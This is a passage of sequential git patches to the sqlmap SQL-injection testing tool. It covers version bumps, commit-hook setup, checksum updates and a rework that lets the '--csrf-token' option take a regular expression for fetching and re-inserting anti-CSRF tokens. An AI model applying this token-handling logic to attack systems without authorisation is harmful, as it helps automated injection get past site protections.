[PATCH 379/428] Commit hooks were disabled --- lib/core/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e6136207bb4..b1f28eb9838 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.0" +VERSION = "1.2.12.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) From ef911b6be4e5e2e07cca731192943b4000e3b158 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:10:01 +0100 Subject: [PATCH 380/428] Dummy commit (just to test hooks) --- lib/core/common.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8da52c896d9..820a881f9a6 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3509,9 +3509,9 @@ def listToStrValue(value): return retVal -def intersect(valueA, valueB, lowerCase=False): +def intersect(containerA, containerB, lowerCase=False): """ - Returns intersection of the array-ized values + Returns intersection of the container-ized values >>> intersect([1, 2, 3], set([1,3])) [1, 3] @@ -3519,15 +3519,15 @@ def intersect(valueA, valueB, lowerCase=False): retVal = [] - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) + if containerA and containerB: + containerA = arrayizeValue(containerA) + containerB = arrayizeValue(containerB) if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] + containerA = [val.lower() if isinstance(val, basestring) else val for val in containerA] + containerB = [val.lower() if isinstance(val, basestring) else val for val in containerB] - retVal = [val for val in valueA if val in valueB] + retVal = [val for val in containerA if val in containerB] return retVal From f81062d5957d4618ba0bc2fe994aa2651641cce1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:20:34 +0100 Subject: [PATCH 381/428] Resolving some more hooking problems --- extra/shutils/postcommit-hook.sh | 10 ++++++++++ extra/shutils/precommit-hook.sh | 10 ++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 22 +++++++++++----------- 4 files changed, 32 insertions(+), 12 deletions(-) diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh index 77ed2824c80..d5d0ed0cf07 100755 --- a/extra/shutils/postcommit-hook.sh +++ b/extra/shutils/postcommit-hook.sh @@ -1,5 +1,15 @@ #!/bin/bash +""" +cat > .git/hooks/post-commit << EOF +#!/bin/bash + +source ./extra/shutils/postcommit-hook.sh +EOF + +chmod +x .git/hooks/post-commit +""" + SETTINGS="../../lib/core/settings.py" declare -x SCRIPTPATH="${0}" diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 3c2137ce239..624df765ab8 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -1,5 +1,15 @@ #!/bin/bash +""" +cat > .git/hooks/pre-commit << EOF +#!/bin/bash + +source ./extra/shutils/precommit-hook.sh +EOF + +chmod +x .git/hooks/pre-commit +""" + PROJECT="../../" SETTINGS="../../lib/core/settings.py" CHECKSUM="../../txt/checksum.md5" diff --git a/lib/core/settings.py b/lib/core/settings.py index b1f28eb9838..f45e3e8f255 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.8" +VERSION = "1.2.12.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b054da5c7ae..7cd9422e814 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,13 +23,13 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py +0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py 95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py +e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -9ed51d3e770b5cec2f8c91e962011d52 lib/core/common.py +9d040f1771efaab4fde8d09821a09f51 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -7dacc178910ab4d57de36c3602bde17d lib/core/option.py +9bf3349158df05775eb41742d6402ad8 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f209388d9fed41480e57c8574d0111a lib/core/settings.py +e71aea1aff5751fdcdc97ba63973a603 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py @@ -85,7 +85,7 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py +9b9aa94a1693efa7a9ae0783cfb56896 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py @@ -96,11 +96,11 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py +214d916bb8b456ae698ca0f5523186ff lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py -7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py +dbddd178a6ca941fa745d9b3edbb979b lib/techniques/union/use.py 038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py @@ -268,8 +268,8 @@ f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py -a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py -759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py +cec3be164c27df01f016f6b0e0981006 tamper/plus2concat.py +167ab896d300bcea811ee61a972950e1 tamper/plus2fnconcat.py b9db4cc9fc4e0a586198340d1268fdaf tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -a676d93d413b07d36495201d88671253 xml/errors.xml +e7c893dd4f3f1d6b5b6f5ffd717d38cc xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml From e47c1aa61bb14c6a7c895dad565054d28564ee4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:21:36 +0100 Subject: [PATCH 382/428] Resolving some more hooking problems --- extra/shutils/postcommit-hook.sh | 4 ++-- extra/shutils/precommit-hook.sh | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh index d5d0ed0cf07..eb3db6c4e0e 100755 --- a/extra/shutils/postcommit-hook.sh +++ b/extra/shutils/postcommit-hook.sh @@ -1,6 +1,6 @@ #!/bin/bash -""" +: ' cat > .git/hooks/post-commit << EOF #!/bin/bash @@ -8,7 +8,7 @@ source ./extra/shutils/postcommit-hook.sh EOF chmod +x .git/hooks/post-commit -""" +' SETTINGS="../../lib/core/settings.py" diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 624df765ab8..5a9fea4246a 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -1,6 +1,6 @@ #!/bin/bash -""" +: ' cat > .git/hooks/pre-commit << EOF #!/bin/bash @@ -8,7 +8,7 @@ source ./extra/shutils/precommit-hook.sh EOF chmod +x .git/hooks/pre-commit -""" +' PROJECT="../../" SETTINGS="../../lib/core/settings.py" diff --git a/lib/core/settings.py b/lib/core/settings.py index f45e3e8f255..ce145fec935 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.9" +VERSION = "1.2.12.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cd9422e814..a105fb39ab1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e71aea1aff5751fdcdc97ba63973a603 lib/core/settings.py +7535ff33c85d9b886f9e631dc0158cb9 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py From 2c95b65eac7a5757a1583a5019fc9c2e047b54d5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 14:53:11 +0100 Subject: [PATCH 383/428] Implementation for #2552 (sorry @mg98) --- lib/controller/controller.py | 2 +- lib/core/common.py | 2 +- lib/core/option.py | 17 ++++++++++ lib/core/settings.py | 2 +- lib/core/target.py | 4 +-- lib/request/connect.py | 64 +++++++++++++++++++----------------- txt/checksum.md5 | 12 +++---- 7 files changed, 61 insertions(+), 42 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 9cdc3534d1c..bc071cbdbb7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -505,7 +505,7 @@ def start(): infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif parameter == conf.csrfToken: + elif re.search(conf.csrfToken, parameter, re.I): testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter diff --git a/lib/core/common.py b/lib/core/common.py index 820a881f9a6..8c103814ffb 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -600,7 +600,7 @@ def paramToDict(place, parameters=None): if condition: testableParameters[parameter] = "=".join(parts[1:]) - if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): + if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)): _ = urldecode(testableParameters[parameter], convall=True) if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " diff --git a/lib/core/option.py b/lib/core/option.py index 499cefb0b0e..85acb8a322f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1560,6 +1560,23 @@ def _cleanupOptions(): except re.error: conf.testFilter = re.escape(conf.testFilter) + if conf.csrfToken: + original = conf.csrfToken + try: + re.compile(conf.csrfToken) + + if re.escape(conf.csrfToken) != conf.csrfToken: + message = "provided value for option '--csrf-token' is a regular expression? [Y/n] " + if not readInput(message, default='Y', boolean=True): + conf.csrfToken = re.escape(conf.csrfToken) + except re.error: + conf.csrfToken = re.escape(conf.csrfToken) + finally: + class _(unicode): + pass + conf.csrfToken = _(conf.csrfToken) + conf.csrfToken._original = original + if conf.testSkip: conf.testSkip = conf.testSkip.strip('*+') conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) diff --git a/lib/core/settings.py b/lib/core/settings.py index ce145fec935..9edfaa5ccee 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.10" +VERSION = "1.2.12.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index a89c0c89143..1b8232a3227 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -393,8 +393,8 @@ def process(match, repl): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): - errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): + errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) else: diff --git a/lib/request/connect.py b/lib/request/connect.py index 8d46dbc7f6e..37ec0fc1e3c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -64,6 +64,7 @@ class WebSocketException(Exception): from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import AttribDict from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY @@ -960,75 +961,76 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): retVal = paramString - match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString) + match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) + retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString, flags=re.I) else: - match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) + match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString, flags=re.I) return retVal + token = AttribDict() page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) - token = extractRegexResult(r"(?i)]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % re.escape(conf.csrfToken), page or "") + match = re.search(r"(?i)]+\bname=[\"']?(?P%s)\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % conf.csrfToken, page or "", re.I) - if not token: - token = extractRegexResult(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "") + if not match: + match = re.search(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P%s)\b" % conf.csrfToken, page or "", re.I) - if not token: - match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "") - token = match.group(1) if match else None + if not match: + match = re.search(r"(?P%s)[\"']:[\"'](?P[^\"']+)" % conf.csrfToken, page or "", re.I) - if not token: - token = extractRegexResult(r"\b%s\s*[:=]\s*(?P\w+)" % re.escape(conf.csrfToken), str(headers)) + if not match: + match = re.search(r"\b(?P%s)\s*[:=]\s*(?P\w+)" % conf.csrfToken, str(headers), re.I) - if not token: - token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P[^;'\"]+)" % re.escape(conf.csrfToken), page or "") + if not match: + match = re.search(r"\b(?P%s)\s*=\s*['\"]?(?P[^;'\"]+)" % conf.csrfToken, page or "", re.I) - if token: - match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token) + if match: + token.name, token.value = match.group("name"), match.group("value") - if match: - token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value) + if match: + token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): for _ in conf.cj: - if _.name == conf.csrfToken: - token = _.value - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if re.search(conf.csrfToken, _.name, re.I): + token.name, token.value = _.name, _.value + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): if post: - post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) + post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) elif get: - get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) + get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) else: - get = "%s=%s" % (conf.csrfToken, token) + get = "%s=%s" % (token.name, token.value) break if not token: - errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url) + errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) if not conf.csrfUrl: errMsg += ". You can try to rerun by providing " errMsg += "a valid value for option '--csrf-url'" raise SqlmapTokenException(errMsg) if token: - token = token.strip("'\"") + token.value = token.value.strip("'\"") for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: if place == PLACE.GET and get: - get = _adjustParameter(get, conf.csrfToken, token) + get = _adjustParameter(get, token.name, token.value) elif place == PLACE.POST and post: - post = _adjustParameter(post, conf.csrfToken, token) + post = _adjustParameter(post, token.name, token.value) for i in xrange(len(conf.httpHeaders)): - if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower(): - conf.httpHeaders[i] = (conf.httpHeaders[i][0], token) + if conf.httpHeaders[i][0].lower() == token.name.lower(): + conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value) if conf.rParam: def _randomizeParameter(paramString, randomParameter): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a105fb39ab1..598fa2831da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,12 +24,12 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py +93f7eabf92f3da3d96cbd8266e30414d lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -9d040f1771efaab4fde8d09821a09f51 lib/core/common.py +cf84ff84891b7f51620a457b0bff28c5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -9bf3349158df05775eb41742d6402ad8 lib/core/option.py +ecf9879967182e6402f3cab6840f5b75 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7535ff33c85d9b886f9e631dc0158cb9 lib/core/settings.py +e0b7d1e6e148bc962df6b59d35910b92 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -52642badbbca4c31a2fcdd754d67a983 lib/core/target.py +d6da5998fea61068a80d9c671db1095f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -77b24c30b1a2163add76652998e74127 lib/request/connect.py +9eb0cc48e7e4779e44f1641aa7d39a4d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From a02662f03fc560ebb6b8b00941d56f60739d525f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 14:53:53 +0100 Subject: [PATCH 384/428] Trivial cleanup --- lib/core/settings.py | 2 +- lib/takeover/metasploit.py | 2 -- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 9edfaa5ccee..54682d6e5be 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.11" +VERSION = "1.2.12.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 356eba16acf..c7a4e18bd7d 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -20,7 +20,6 @@ from lib.core.common import Backend from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import pollProcess @@ -39,7 +38,6 @@ from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER -from lib.core.settings import UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD from lib.core.subprocessng import Popen as execute diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 598fa2831da..791a7ad672a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e0b7d1e6e148bc962df6b59d35910b92 lib/core/settings.py +24f1c46a4530bde2d66a20ae59f745cd lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py d6da5998fea61068a80d9c671db1095f lib/core/target.py @@ -85,7 +85,7 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -9b9aa94a1693efa7a9ae0783cfb56896 lib/takeover/metasploit.py +4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py From 2e5edce8b9001e8a69ea2b89564dda9ce39b5ec4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 15:22:53 +0100 Subject: [PATCH 385/428] Fixes #3399 --- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index bc071cbdbb7..864ea91c9cc 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -505,7 +505,7 @@ def start(): infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif re.search(conf.csrfToken, parameter, re.I): + elif conf.csrfToken and re.search(conf.csrfToken, parameter, re.I): testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter diff --git a/lib/core/settings.py b/lib/core/settings.py index 54682d6e5be..3b14bfa9664 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.12" +VERSION = "1.2.12.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] 